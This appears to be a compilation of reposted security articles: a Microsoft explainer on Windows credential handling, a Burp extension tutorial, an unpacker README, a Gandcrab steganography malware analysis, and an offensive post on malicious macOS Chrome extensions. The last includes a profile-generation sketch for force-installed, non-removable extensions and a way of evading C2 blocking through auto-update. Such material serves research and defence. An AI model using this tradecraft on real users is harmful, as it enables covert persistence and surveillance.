The Remote Desktop Protocol (RDP) manages the credentials of the user who connects to a remote computer by using the Remote Desktop Client, which was introduced in Windows 8. The credentials in plaintext form are sent to the target host, where the host attempts to perform the authentication process and, if successful, connects the user to allowed resources. RDP does not store the credentials on the client, but the user's domain credentials are stored in the LSASS.

Introduced in Windows Server 2012 R2 and Windows 8.1, Restricted Admin mode provides additional security to remote logon scenarios. This mode of Remote Desktop causes the client application to perform a network logon challenge-response with the NT one-way function (NTOWF) or use a Kerberos service ticket when authenticating to the remote host. After the administrator is authenticated, the administrator does not have the respective account credentials in LSASS because they were not supplied to the remote host. Instead, the administrator has the computer account credentials for the session. Administrator credentials are not supplied to the remote host, so actions are performed as the computer account. Resources are also limited to the computer account, and the administrator cannot access resources with his own account.

Automatic restart sign-on credential process

When a user signs in on a Windows 8.1 device, LSA saves the user credentials in encrypted memory that is accessible only by LSASS.exe. When Windows Update initiates an automatic restart without user presence, these credentials are used to configure Autologon for the user.
On restart, the user is automatically signed in via the Autologon mechanism, and then the computer is additionally locked to protect the user's session. The locking is initiated through Winlogon, whereas the credential management is done by LSA. By automatically signing in and locking the user's session on the console, the user's lock screen applications are restarted and available. For more information about ARSO, see Winlogon Automatic Restart Sign-On (ARSO).

Stored user names and passwords in Windows Vista and Windows XP

In Windows Server 2008, Windows Server 2003, Windows Vista, and Windows XP, Stored User Names and Passwords in Control Panel simplifies the management and use of multiple sets of logon credentials, including X.509 certificates used with smart cards and Windows Live credentials (now called Microsoft account). The credentials, part of the user's profile, are stored until needed. This can increase security on a per-resource basis by ensuring that if one password is compromised, it does not compromise all security.

After a user logs on and attempts to access additional password-protected resources, such as a share on a server, and if the user's default logon credentials are not sufficient to gain access, Stored User Names and Passwords is queried. If alternate credentials with the correct logon information have been saved in Stored User Names and Passwords, these credentials are used to gain access. Otherwise, the user is prompted to supply new credentials, which can then be saved for reuse, either later in the logon session or during a subsequent session.

The following restrictions apply:

- If Stored User Names and Passwords contains invalid or incorrect credentials for a specific resource, access to the resource is denied, and the Stored User Names and Passwords dialog box does not appear.
- Stored User Names and Passwords stores credentials only for NTLM, Kerberos protocol, Microsoft account (formerly Windows Live ID), and Secure Sockets Layer (SSL) authentication. Some versions of Internet Explorer maintain their own cache for basic authentication.

These credentials become an encrypted part of a user's local profile in the \Documents and Settings\Username\Application Data\Microsoft\Credentials directory. As a result, these credentials can roam with the user if the user's network policy supports Roaming User Profiles. However, if the user has copies of Stored User Names and Passwords on two different computers and changes the credentials that are associated with the resource on one of these computers, the change is not propagated to Stored User Names and Passwords on the second computer.

Windows Vault and Credential Manager

Credential Manager was introduced in Windows Server 2008 R2 and Windows 7 as a Control Panel feature to store and manage user names and passwords. Credential Manager lets users store credentials relevant to other systems and websites in the secure Windows Vault. Some versions of Internet Explorer use this feature for authentication to websites. Credential management by using Credential Manager is controlled by the user on the local computer. Users can save and store credentials from supported browsers and Windows applications to make it convenient when they need to sign in to these resources. Credentials are saved in special encrypted folders on the computer under the user's profile.
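These Credential Manager APIs, discussed further below, are exposed to Python via pywin32's win32cred module. A hedged sketch of writing and reading back a generic credential in the Windows Vault; the target name and values are illustrative only:

import win32cred  # pywin32 wrapper over the Credential Manager APIs

TARGET = "example.internal/demo"  # illustrative target name

win32cred.CredWrite({
    "Type": win32cred.CRED_TYPE_GENERIC,
    "TargetName": TARGET,
    "UserName": "demo-user",
    "CredentialBlob": "demo-password",   # stored encrypted in the Vault
    "Persist": win32cred.CRED_PERSIST_LOCAL_MACHINE,
}, 0)

cred = win32cred.CredRead(TARGET, win32cred.CRED_TYPE_GENERIC)
print(cred["UserName"])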
Applications that support this feature (through the use of the Credential Manager APIs), such as web browsers and apps, can present the correct credentials to other computers and websites during the logon process. When a website, an application, or another computer requests authentication through NTLM or the Kerberos protocol, a dialog box appears in which you select the Update Default Credentials or Save Password check box. This dialog box that lets a user save credentials locally is generated by an application that supports the Credential Manager APIs. If the user selects the Save Password check box, Credential Manager keeps track of the user's user name, password, and related information for the authentication service that is in use. The next time the service is used, Credential Manager automatically supplies the credential that is stored in the Windows Vault. If it is not accepted, the user is prompted for the correct access information. If access is granted with the new credentials, Credential Manager overwrites the previous credential with the new one and then stores the new credential in the Windows Vault. Security Accounts Manager database The Security Accounts Manager (SAM) is a database that stores local user accounts and groups. It is present in every Windows operating system; however, when a computer is joined to a domain, Active Directory manages domain accounts in Active Directory domains. For example, client computers running a Windows operating system participate in a network domain by communicating with a domain controller even when no human user is logged on. To initiate communications, the computer must have an active account in the domain. Before accepting communications from the computer, the LSA on the domain controller authenticates the computer's identity and then constructs the computer's security context just as it does for a human security principal. This security context defines the identity and capabilities of a user or service on a particular computer or a user, service, or computer on a network. For example, the access token contained within the security context defines the resources (such as a file share or printer) that can be accessed and the actions (such as Read, Write, or Modify) that can be performed by that principal - a user, computer, or service on that resource. The security context of a user or computer can vary from one computer to another, such as when a user logs on to a server or a workstation other than the user's own primary workstation. It can also vary from one session to another, such as when an administrator modifies the user's rights and permissions. In addition, the security context is usually different when a user or computer is operating on a stand-alone basis, in a network, or as part of an Active Directory domain. Local domains and trusted domains When a trust exists between two domains, the authentication mechanisms for each domain rely on the validity of the authentications coming from the other domain. Trusts help to provide controlled access to shared resources in a resource domain (the trusting domain) by verifying that incoming authentication requests come from a trusted authority (the trusted domain). In this way, trusts act as bridges that let only validated authentication requests travel between domains. How a specific trust passes authentication requests depends on how it is configured. 
Trust relationships can be one-way, by providing access from the trusted domain to resources in the trusting domain, or two-way, by providing access from each domain to resources in the other domain. Trusts are also either nontransitive, in which case a trust exists only between the two trust partner domains, or transitive, in which case a trust automatically extends to any other domains that either of the partners trusts. For information about domain and forest trust relationships regarding authentication, see Delegated Authentication and Trust Relationships.

Certificates in Windows authentication

A public key infrastructure (PKI) is the combination of software, encryption technologies, processes, and services that enable an organization to secure its communications and business transactions. The ability of a PKI to secure communications and business transactions is based on the exchange of digital certificates between authenticated users and trusted resources. A digital certificate is an electronic document that contains information about the entity it belongs to, the entity it was issued by, a unique serial number or some other unique identification, issuance and expiration dates, and a digital fingerprint.

Authentication is the process of determining whether a remote host can be trusted. To establish its trustworthiness, the remote host must provide an acceptable authentication certificate. Remote hosts establish their trustworthiness by obtaining a certificate from a certification authority (CA). The CA can, in turn, have certification from a higher authority, which creates a chain of trust. To determine whether a certificate is trustworthy, an application must determine the identity of the root CA and then determine whether it is trustworthy. Similarly, the remote host or local computer must determine whether the certificate presented by the user or application is authentic. The certificate presented by the user through the LSA and SSPI is evaluated for authenticity on the local computer for local logon, on the network, or on the domain through the certificate stores in Active Directory.

To produce a certificate, authentication data passes through hash algorithms, such as Secure Hash Algorithm 1 (SHA1), to produce a message digest. The message digest is then digitally signed by using the sender's private key to prove that the message digest was produced by the sender. Note: SHA1 is the default in Windows 7 and Windows Vista, but was changed to SHA2 in Windows 8.

Smart card authentication

Smart card technology is an example of certificate-based authentication. Logging on to a network with a smart card provides a strong form of authentication because it uses cryptography-based identification and proof of possession when authenticating a user to a domain. Active Directory Certificate Services (AD CS) provides the cryptographic-based identification through the issuance of a logon certificate for each smart card. For information about smart card authentication, see the Windows Smart Card Technical Reference.

Virtual smart card technology was introduced in Windows 8. It stores the smart card's certificate in the PC and protects it by using the device's tamper-proof Trusted Platform Module (TPM) security chip. In this way, the PC actually becomes the smart card, which must receive the user's PIN in order to be authenticated.
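The digest-and-sign flow described above can be sketched with the Python cryptography package. Note that this example uses SHA-256 rather than the SHA-1 default mentioned for older Windows versions, and the message content is illustrative:

from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding

# Sender: hash the authentication data and sign the digest with the private key
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
message = b"authentication data"
signature = private_key.sign(message, padding.PKCS1v15(), hashes.SHA256())

# Receiver: verify with the sender's public key; raises InvalidSignature on tamper
private_key.public_key().verify(signature, message, padding.PKCS1v15(), hashes.SHA256())
print("signature verified")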
Remote and wireless authentication

Remote and wireless network authentication is another technology that uses certificates for authentication. The Internet Authentication Service (IAS) and virtual private network servers use Extensible Authentication Protocol-Transport Level Security (EAP-TLS), Protected Extensible Authentication Protocol (PEAP), or Internet Protocol security (IPsec) to perform certificate-based authentication for many types of network access, including virtual private network (VPN) and wireless connections. For information about certificate-based authentication in networking, see Network access authentication and certificates.

Sursa: https://docs.microsoft.com/en-us/windows-server/security/windows-authentication/credentials-processes-in-windows-authentication
-
February 7, 2019 Jake

Burp Extension Python Tutorial – Encode/Decode/Hash

This post provides step-by-step instructions for writing a Burp extension in Python. This differs from my previous extension-writing tutorial, where we only worked in the message tab, and I will be moving a bit more quickly than in that post. Here is what this post will cover:

- Importing required modules and accessing the Burp Extender API
- Creating a tab for the extension
- Writing the GUI text fields and buttons
- Writing the functions that run when you click the buttons

This extension will have its own tab and GUI components, and will be a little more useful than the extension written previously. It is inspired by a tool of the same name included in OWASP's ZAP. Let's get started.

Setup

1. Create a folder where you'll store your extensions – I named mine extensions
2. Download the Jython standalone JAR file – place it in the extensions folder
3. Download exceptions_fix.py to the extensions folder – this will make debugging easier
4. Configure Burp to use Jython – Extender > Options > Python Environment > Select file
5. Create a new file (encodeDecodeHash.py) in your favorite text editor (save it in your extensions folder)

Importing required modules, accessing the Extender API, and implementing the debugger

Let's write some code:

from burp import IBurpExtender, ITab
from javax import swing
from java.awt import BorderLayout
import sys
try:
    from exceptions_fix import FixBurpExceptions
except ImportError:
    pass

The IBurpExtender module is required for all extensions, while ITab will register the tab in Burp and send Burp the UI that we will define. The swing library is used to build GUI applications with Jython, and we'll be using layout management, specifically BorderLayout from the java.awt library. The sys module is imported so Python errors are shown in stdout with the help of the FixBurpExceptions script. I placed that import in a try/except block so the code still works if the script is missing. I'll add more imports when we start writing the encoding methods, but this is enough for now.

This next snippet registers our extension and creates a new tab that will contain the UI. If you're following along, type or paste this code after the imports:

class BurpExtender(IBurpExtender, ITab):
    def registerExtenderCallbacks(self, callbacks):

        # Required for easier debugging:
        # https://github.com/securityMB/burp-exceptions
        sys.stdout = callbacks.getStdout()

        # Keep a reference to our callbacks object
        self.callbacks = callbacks

        # Set our extension name
        self.callbacks.setExtensionName("Encode/Decode/Hash")

        # Create the tab
        self.tab = swing.JPanel(BorderLayout())

        # Add the custom tab to Burp's UI
        callbacks.addSuiteTab(self)
        return

    # Implement ITab
    def getTabCaption(self):
        """Return the text to be displayed on the tab"""
        return "Encode/Decode/Hash"

    def getUiComponent(self):
        """Passes the UI to Burp"""
        return self.tab

try:
    FixBurpExceptions()
except:
    pass

This class implements IBurpExtender, which is required for all extensions and must be called BurpExtender. Within the required method, registerExtenderCallbacks, the line self.callbacks keeps a reference to Burp so we can interact with it; in our case it is used to create the tab in Burp. ITab requires two methods, getTabCaption and getUiComponent: getTabCaption returns the name of the tab, and getUiComponent returns the UI itself (self.tab), which is created in the line self.tab = swing.JPanel(BorderLayout()).
FixBurpExceptions is called at the end of the script just in case we have an error (thanks @SecurityMB!). Save the script to your extensions folder and then load the file into Burp: Extender > Extensions > Add > Extension Details > Extension Type: Python > Select file… > encodeDecodeHash.py

The extension should load and you should have a new tab. This tab doesn’t have any features yet, so let’s build the skeleton of the UI. Before I go into the code, I’ll model out the GUI so that it will hopefully make a little more sense. There are different layout managers that you can use in Java, and I chose to use BorderLayout in the main tab, so when I place panels on the tab, I can specify that they should go in relative positions, such as North or Center. Within the two panels I created boxes that contain other boxes. I did this so that text areas and labels would appear on different lines, but stay in the general area that I wanted them to. There are probably better ways to do this, but here is the model:

Onto the code:

class BurpExtender(IBurpExtender, ITab):
    ...
        self.tab = swing.JPanel(BorderLayout())

        # Create the text area at the top of the tab
        textPanel = swing.JPanel()

        # Create the label for the text area
        boxVertical = swing.Box.createVerticalBox()
        boxHorizontal = swing.Box.createHorizontalBox()
        textLabel = swing.JLabel("Text to be encoded/decoded/hashed")
        boxHorizontal.add(textLabel)
        boxVertical.add(boxHorizontal)

        # Create the text area itself
        boxHorizontal = swing.Box.createHorizontalBox()
        self.textArea = swing.JTextArea('', 6, 100)
        self.textArea.setLineWrap(True)
        boxHorizontal.add(self.textArea)
        boxVertical.add(boxHorizontal)

        # Add the text label and area to the text panel
        textPanel.add(boxVertical)

        # Add the text panel to the top of the main tab
        self.tab.add(textPanel, BorderLayout.NORTH)

        # Add the custom tab to Burp's UI
        callbacks.addSuiteTab(self)
        return
    ...

A bit of explanation. The code textPanel = swing.JPanel() creates a new panel that will contain the text label and text area. Then a box is created (boxVertical) that will be used to hold other boxes (boxHorizontal) that contain the text label and area. The horizontal boxes get added to the vertical box (boxVertical.add(boxHorizontal)), the vertical box is added to the panel we created (textPanel.add(boxVertical)), and that panel is added to the main tab panel at the top (BorderLayout.NORTH). Save the code, unload/reload the extension, and this is what you should see:

Now we’ll add the tabs:

        self.tab.add(textPanel, BorderLayout.NORTH)

        # Create a tabbed pane to go in the center of the
        # main tab, below the text area
        tabbedPane = swing.JTabbedPane()
        self.tab.add("Center", tabbedPane)

        # First tab
        firstTab = swing.JPanel()
        firstTab.layout = BorderLayout()
        tabbedPane.addTab("Encode", firstTab)

        # Second tab
        secondTab = swing.JPanel()
        secondTab.layout = BorderLayout()
        tabbedPane.addTab("Decode", secondTab)

        # Third tab
        thirdTab = swing.JPanel()
        thirdTab.layout = BorderLayout()
        tabbedPane.addTab("Hash", thirdTab)

        # Add the custom tab to Burp's UI
        callbacks.addSuiteTab(self)
        return
    ...

After you add this code and save the file, you should have your tabs. To keep this post short, we’re only going to build out the Encode tab, but the steps will be the same for each tab.
        # First tab
        firstTab = swing.JPanel()
        firstTab.layout = BorderLayout()
        tabbedPane.addTab("Encode", firstTab)

        # Button for first tab
        buttonPanel = swing.JPanel()
        buttonPanel.add(swing.JButton('Encode', actionPerformed=self.encode))
        firstTab.add(buttonPanel, "North")

        # Panel for the encoders. Each label and text field
        # will go in horizontal boxes which will then go in
        # a vertical box
        encPanel = swing.JPanel()
        boxVertical = swing.Box.createVerticalBox()

        boxHorizontal = swing.Box.createHorizontalBox()
        self.b64EncField = swing.JTextField('', 75)
        boxHorizontal.add(swing.JLabel("  Base64    :"))
        boxHorizontal.add(self.b64EncField)
        boxVertical.add(boxHorizontal)

        boxHorizontal = swing.Box.createHorizontalBox()
        self.urlEncField = swing.JTextField('', 75)
        boxHorizontal.add(swing.JLabel("  URL       :"))
        boxHorizontal.add(self.urlEncField)
        boxVertical.add(boxHorizontal)

        boxHorizontal = swing.Box.createHorizontalBox()
        self.asciiHexEncField = swing.JTextField('', 75)
        boxHorizontal.add(swing.JLabel("  Ascii Hex :"))
        boxHorizontal.add(self.asciiHexEncField)
        boxVertical.add(boxHorizontal)

        boxHorizontal = swing.Box.createHorizontalBox()
        self.htmlEncField = swing.JTextField('', 75)
        boxHorizontal.add(swing.JLabel("  HTML      :"))
        boxHorizontal.add(self.htmlEncField)
        boxVertical.add(boxHorizontal)

        boxHorizontal = swing.Box.createHorizontalBox()
        self.jsEncField = swing.JTextField('', 75)
        boxHorizontal.add(swing.JLabel("  JavaScript:"))
        boxHorizontal.add(self.jsEncField)
        boxVertical.add(boxHorizontal)

        # Add the vertical box to the Encode tab
        firstTab.add(boxVertical, "Center")

        # Second tab
        ...
        # Third tab
        ...

        # Add the custom tab to Burp's UI
        callbacks.addSuiteTab(self)
        return

    # Implement the functions from the button clicks
    def encode(self, event):
        pass

    # Implement ITab
    def getTabCaption(self):
    ...

First we create a panel (buttonPanel) to hold our button, and then we add a button to the panel and specify the argument actionPerformed=self.encode, where self.encode is a method that will run when the button is clicked. We define encode at the end of the code snippet, and currently have it doing nothing. We’ll implement the encoders later. Now that our panel has a button, we add that to the first tab of the panel (firstTab.add(buttonPanel, "North")). Next we create a separate panel for the encoder text labels and fields. Similar to before, we create a big box (boxVertical), and then create a horizontal box (boxHorizontal) for each pair of labels/text fields, which then get added to the big box. Finally, that big box gets added to the tab. After saving the file and unloading/reloading, this is what the program should look like:

The button might not seem to do anything, but it is actually executing the encode method we defined (which does nothing). Let’s fix that method and have it encode the user input:

...
try:
    from exceptions_fix import FixBurpExceptions
except ImportError:
    pass
import base64
import urllib
import binascii
import cgi
import json
...

        # Add the custom tab to Burp's UI
        callbacks.addSuiteTab(self)
        return

    # Implement the functions from the button clicks
    def encode(self, event):
        """Encodes the user input and writes the encoded value to text fields.
""" self.b64EncField.text = base64.b64encode(self.textArea.text) self.urlEncField.text = urllib.quote(self.textArea.text) self.asciiHexEncField.text = binascii.hexlify(self.textArea.text) self.htmlEncField.text = cgi.escape(self.textArea.text) self.jsEncField.text = json.dumps(self.textArea.text) # Implement ITab def getTabCaption(self): … The encode method sets the text on the encode fields we created by encoding whatever the user types in the top text area (self.textArea.text). Once you save and unload/reload the file you should have full encoding functionality. And that’s it! The process is the same for the other tabs, and if you’re interested in the whole extension, it is available on my GitHub. Hopefully this post makes developing your own extensions a little easier. It was definitely a good learning experience for me. Feedback is welcome. Sursa: https://laconicwolf.com/2019/02/07/burp-extension-python-tutorial-encode-decode-hash/
Un{i}packer

Unpacking PE files using Unicorn Engine

The usage of runtime packers by malware authors is very common, as it is a technique that helps to hinder analysis. Furthermore, packers are a challenge for antivirus products, as they make it impossible to identify malware by signatures or hashes alone.

In order to be able to analyze a packed malware sample, it is often required to unpack the binary. Usually this means that the analyst will have to manually unpack the binary by using dynamic analysis techniques (tools: OllyDbg, x64Dbg). There are also some approaches for automatic unpacking, but they are all only available for Windows. Therefore, when targeting a packed Windows malware, the analyst will require a Windows machine. The goal of our project is to enable platform-independent automatic unpacking by using emulation.

Supported packers

UPX: Cross-platform, open source packer
ASPack: Advanced commercial packer with a high compression ratio
PEtite: Freeware packer, similar to ASPack
FSG: Freeware, fast to unpack

Usage

Install r2 and YARA
pip3 install -r requirements.txt
python3 unipacker.py

For detailed instructions on how to use Un{i}packer, please refer to the Wiki. Additionally, all of the shell commands are documented. To access this information, use the help command.

Source: https://github.com/unipacker/unipacker
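Un{i}packer identifies the packer automatically. As a rough illustration of how such identification can work (this is not Un{i}packer's actual implementation), a section-name heuristic using the pefile library might look like this:

import pefile

def looks_upx_packed(path):
    """Rough heuristic: UPX renames PE sections to UPX0/UPX1."""
    pe = pefile.PE(path)
    names = [s.Name.rstrip(b'\x00').decode(errors='replace')
             for s in pe.sections]
    return any(n.startswith('UPX') for n in names)

print(looks_upx_packed('sample.exe'))

Real detection (as in Un{i}packer and in YARA rules generally) also looks at entry-point bytes and entropy, since section names are trivial to rename.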
Super Mario Oddity

A few days ago, I was investigating a sample piece of malware where our static analysis flagged a spreadsheet as containing a Trojan but the behavioural trace showed very little happening. This is quite common for various reasons, but one of the quirks of how we work at Bromium is that we care about getting malware to run and fully detonate within our secure containers. This enables our customers to understand the threats they are facing, and to take any other remedial action necessary without any risk to their endpoints or company assets. Running their malware actually makes our customers more secure.

A quick look at the macros in this spreadsheet revealed that it was coded to exit Excel immediately if the machine was not based in Italy (country 39):

We often see malware samples failing to run based on location, but usually they look for signs of being in Russia. This is widely believed to help groups based there avoid prosecution by local authorities, but of course leads to false-flag usage too. My interest was piqued, so I modified the document to remove this check so that it would open, and then I could see whether we could get the malware to detonate. The usual social engineering prompt is displayed on opening:

Roughly translated as ‘It’s not possible to view the preview online. To view the content, you need to click on “enable edit” and “enable content”’.

After modifying the spreadsheet, the malware detonates inside one of our containers. We see the usual macro-based launch of cmd.exe and PowerShell with obfuscated arguments. This is very run-of-the-mill, but these arguments stood out as not being from one of the usual obfuscators we see, so I was determined to dig a bit deeper: (truncated very early)

As a side note, malware authors actually spend quite a lot of effort on marketing, including often mentioning specific researchers by name within samples. This happens because of the nature of modern Platform Criminality – malware is licensed to affiliates for distribution, and in order to attract the most interest and best prices, malware authors need to make a name for themselves. It’s not clear whether this sample was actually trying to encourage me to investigate, but sometimes huge clues like this are put into samples on purpose.

The binary strings are just a list of encoded characters, so this was easily reconstructed to the following code, which looks like PowerShell:

At this point, things seemed particularly interesting. My PowerShell skills are basic, but it looks like this sample is trying to download an image and extract some data from the pixel values. There was only one person to turn to – our PowerShell evangelist and polymath Tim Howes, who was also intrigued. Meanwhile, I pulled the images, with each looking roughly like this: (I’ve slightly resized and blurred).

Steganographic techniques such as using the low bits from pixel values are clearly not new, but it’s rare that we see this kind of thing in malspam; even at Bromium, where we normally see slightly more advanced malware that evaded the rest of the endpoint security stack. It’s also pretty hard to defend against this kind of traffic at the firewall. Now over to Tim to make sense of the PowerShell plumbing.

A manual re-shuffle to de-obfuscate the code, and you can see more clearly the bitwise operation on the blue and green pixels.
Since only the lower 4 bits of blue and green have been used, this won’t make a big difference to the image when looked at by a human, but it is quite trivial to hide some code within. Recasting the above code to a different form makes it slightly clearer where in the image we’re extracting from:

This equates to the area in blue at the top of the image here:

The above code is finding the next level of code from the blue and green channels of pixels in a small region of the image. The lower bits of each pixel are used as adjustments to these and yield minimal differences to the perceived image. Running this presents yet more heavily obfuscated PowerShell:

We can work through this by noticing that there is another large string (base64 encoded) sliced/diced into 40 parts. This can be reassembled:

Looking at the above, we see they are using a .NET decompressor; so employing our own local variables to step through each part yields:

This gives a resultant stream of yet more PowerShell:

We execute the “-split” operations on the large string and then convert to a string:

We now see that $str is still more mildly obfuscated PowerShell:

There’s another slice/dice to form “iex” (the alias for invoke-expression in PowerShell): ($env:comspec)[4,15,25] == 'iex'.

The manually de-obfuscated PowerShell reveals the final level, which is dropping and executing from a site, but only if the output of ‘get-culture’ on the machine matches “ita” (for example, if the culture is Italian, which matches the earlier targeting attempts). Thanks Tim!

We downloaded the samples from the above, including from an Italy-based VPN, and were given various samples of Gandcrab ransomware. Gandcrab saw phenomenal success last year, initially being distributed by exploit kits and becoming especially prevalent in the Far East. I am generally skeptical of malware attribution claims, and the implications of so much obfuscated code hidden within a picture of Mario and checking for an Italian victim are not obvious; for all we know, the fictional Wario may be as likely to be responsible as any geopolitical actor. However, a future avenue for investigation here is to examine the encoded affiliate IDs, and compare against samples we have collected from other sources to see if there are patterns for whom this affiliate is targeting.

Another key forensic advantage that we have at Bromium is that we partition our isolation at the granularity of a user task (in this instance, the opening of a piece of malspam from an email). This means we can associate each sample with lots of forensic metadata about the task the user was performing, simply because they are from the same container. Mining our set of Gandcrab samples to track the behaviour of their affiliates is definitely a task for another day. Whether or not they are based in a targeted country, our users can open malicious emails safely and transparently with Bromium, as our hardware-enforced containers securely isolate the malware from the host system (our princess is in another castle).
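The low-nibble extraction technique itself is easy to reproduce. The sketch below is illustrative only: the region, channel order, and nibble packing are assumptions for demonstration, not the parameters used by the actual sample's PowerShell:

from PIL import Image

def extract_low_nibbles(path, width=200, height=10):
    """Rebuild hidden bytes from the low 4 bits of the blue and
    green channels of pixels in a top-left region of the image."""
    img = Image.open(path).convert('RGB')
    out = bytearray()
    for y in range(height):
        for x in range(width):
            r, g, b = img.getpixel((x, y))
            # One byte per pixel: blue nibble high, green nibble low (assumed)
            out.append(((b & 0x0F) << 4) | (g & 0x0F))
    return bytes(out)

print(extract_low_nibbles('mario.png')[:64])

Because only the low 4 bits of two channels change, the carrier image is visually indistinguishable from the original, which is exactly why this traffic is so hard to filter at the firewall.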
IOCs:

Original spreadsheet: 3849381059d9e8bbcc59c253d2cbe1c92f7e1f1992b752d396e349892f2bb0e7
Mario image: 2726cd6796774521d03a5f949e10707424800882955686c886d944d2b2a61e0
Other Mario image: 0c8c27f06a0acb976b8f12ff6749497d4ce1f7a98c2a161b0a9eb956e6955362
Ultimate EXEs:
ec2a7e8da04bc4e60652d6f7cc2d41ec68ff900d39fc244cc3b5a29c42acb7a4
630b6f15c770716268c539c5558152168004657beee740e73ee9966d6de1753f

February 8, 2019 • Category: Threats • By: Matthew Rowen

Source: https://www.bromium.com/gandcrab-ransomware-code-hiding-in-image/
No Place Like Chrome

Christopher Ross
Feb 8

Chrome extensions were first introduced to the public in December of 2009 and use HTML, JavaScript, and CSS to extend Chrome’s functionality. Extensions can leverage the Chrome API to block ads, change the browser UI, manage cookies, and even work in conjunction with desktop applications. They’re also restricted by a finite set of permissions that are granted by the user during the installation process. With a rich set of native APIs, Chrome extensions provide a more than adequate alternative for hiding malicious code. With the emergence of EDR products and new security features for macOS and Windows 10, endpoint security has improved. However, there has been a lack of detection capabilities for the use of malicious Chrome extensions on macOS. As a result, they have become an enticing initial access and persistence payload. This post will cover a payload delivery mechanism for extensions on macOS, leveraging the auto-update feature for offensive purposes, a practical example using Apfell, and some basic, but actionable, detection guidance.

Payload Delivery

There are a few methods that can be used to legitimately install extensions on macOS. Google forces developers to distribute extensions through the web store. Recently, Google changed their policy so that extensions cannot be installed from third party sites. Adversaries may still host extensions on the web store anyway, but it was a necessary policy change. Alternatively, extensions can be installed on macOS with the use of mobile configuration profiles. Configuration profiles are used on macOS and iOS to manage various settings, including power management, DNS servers, login items, WiFi settings, wallpaper, and even applications like Google Chrome. End-users can install profiles by double-clicking on the file or on the command line with the profiles command. Mobile configuration profiles are XML-formatted and follow a relatively simple format. To create a mobile configuration profile, a payload UUID, application ID, and update URL (this will be covered later) are required. For more information on configuration profiles, please refer to this article and this reference. Here is an example that can be used as a template.

The ExtensionInstallSources key specifies the URLs from which extensions can be installed. Wildcards can be used in the protocol, host, and URI fields. The ExtensionInstallForceList value refers to a list of extensions that will be installed without the users’ consent and cannot be uninstalled. The PayloadRemovalDisallowed key prevents non-admin users from uninstalling the profile. For other keys that can be used to manage extensions and other Google Chrome settings in general, please refer to this. Configuration profiles can be utilized to manage a myriad of settings for macOS and warrant further investigation for additional offensive use cases.

An interesting note about configuration profiles: they can be delivered via email, and subsequently the end-user will not see any prompts from Gatekeeper, macOS’s code signing enforcement and verification tool. However, the user will be prompted to confirm the installation of a profile.

Figure 1

If the profile is unsigned, the end-user will be presented with a second prompt (figure 2) before being prompted for admin credentials.

Figure 2

However, when installing a signed profile, the OS will only prompt once for the install and then admin credentials.
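As a rough illustration of the profile structure described above, such a template could be generated with Python's plistlib. This is a sketch under stated assumptions, not a tested profile: the payload key names follow the article's template and Chrome's managed-policy keys, and should be checked against Apple's and Google's documentation before use; all identifiers and URLs are placeholders:

import plistlib
import uuid

# Hypothetical values; APPID and the update URL come from packing
# your own extension (covered later in the walkthrough).
app_id = "aaaabbbbccccddddeeeeffffgggghhhh"
update_url = "https://example.com/updates.xml"

chrome_payload = {
    "PayloadType": "com.google.Chrome",
    "PayloadVersion": 1,
    "PayloadIdentifier": "com.example.chromepolicy",
    "PayloadUUID": str(uuid.uuid4()).upper(),
    "ExtensionInstallSources": ["https://example.com/*"],
    # Assumed entry format: "<extension id>;<update url>"
    "ExtensionInstallForceList": ["%s;%s" % (app_id, update_url)],
}

profile = {
    "PayloadType": "Configuration",
    "PayloadVersion": 1,
    "PayloadIdentifier": "com.example.profile",
    "PayloadUUID": str(uuid.uuid4()).upper(),
    "PayloadDisplayName": "Chrome Settings",
    "PayloadRemovalDisallowed": True,
    "PayloadContent": [chrome_payload],
}

with open("chrome.mobileconfig", "wb") as f:
    plistlib.dump(profile, f)

Note the two unique UUIDs, one per payload dictionary, matching the requirement mentioned later in the setup steps.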
After the installation, the profile contents can be seen in the Profiles preference pane. If the profile is unsigned, that will be noted in red.

Figure 3

Now that the extension policy has been set for Chrome, when the application is opened, it will make a series of web requests to the update URL specified in the profile. The update URL should point to an update manifest file that specifies the application ID and the URL for the extension file (.crx). Refer to the auto-update documentation for an example manifest file. Next, Chrome will download the extension and save it to ~/Library/Application Support/Google/Chrome/Default/Extensions/APPID. At this point, the extension is loaded into the browser and executed. Note that during this entire process, the configuration profile is the only component that requires user interaction.

Similarly, on Windows, an extension can be silently installed by modifying the registry keys noted here. However, if the installation source is a third party site, Chrome will only allow inline installs. This type of install requires users to browse to your site and then redirects them to the Chrome web store to complete the installation.

Auto-Update FTW

In order to easily manage bug fixes and security patches, extensions can be automatically updated. When hosting extensions in the Chrome Web Store, Google handles updating your extension. Just upload a new copy of your extension, and after a few hours the browser will update the extension via the web store. For extensions hosted outside the web store, developers have more control. Chrome uses the update URL in the manifest.json file to periodically check for updates. During this process, Chrome will read the update manifest file and compare the version in the manifest with the current version of the extension. If the manifest version is higher, the browser will download the newest version of the extension and install it. For an example update manifest, please go here. The update manifest is an XML-formatted file that contains the APPID and a URL that points to the .crx file.

Auto-update is a particularly useful feature for adversaries. In Figures 4 and 5, a malicious extension uses one domain for standard C2 comms and another domain to host the update manifest and extension file. Imagine the scenario where incident response has identified the C2 domain as malicious and blocks all traffic to that domain (1). However, traffic to the update URL is still permitted (2 & 3). An adversary can update the manifest version, change the C2 domain (4), the update URL, and even modify some of the extension’s core code. After some time, Google Chrome will make a request to the update URL and load the new version of the extension with the new C2 domains.

Figure 4
Figure 5

Additionally, if an attacker loses control of the extension, or perhaps it even crashed, they can remotely trigger execution with an update. As long as the extension remains installed, Chrome will continue to check for updates. If only the manifest version is updated, Chrome will re-install the extension and trigger its execution. Next, we’ll cover how to use a PoC Chrome extension and manage the C2 server with Apfell.

Malicious Extensions: IRL

Apfell is a post-exploitation framework centered around customization and modularity. The framework targets the macOS platform by default, but a user can create new C2 profiles that target any platform. Apfell is an ideal framework to use for a malicious Chrome extension.
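To make the auto-update flow concrete before the walkthrough, here is a sketch of the file served at the update_url, rendered from Python. The XML format follows Google's auto-update documentation; the appid, codebase, and version values are placeholders:

# Sketch: render the update manifest that Chrome polls at the update_url.
MANIFEST = """<?xml version='1.0' encoding='UTF-8'?>
<gupdate xmlns='http://www.google.com/update2/response' protocol='2.0'>
  <app appid='{app_id}'>
    <updatecheck codebase='{crx_url}' version='{version}' />
  </app>
</gupdate>
"""

def render_update_manifest(app_id, crx_url, version):
    return MANIFEST.format(app_id=app_id, crx_url=crx_url, version=version)

# Bumping `version` above the installed one is what makes Chrome fetch
# and reload the .crx on its next update check.
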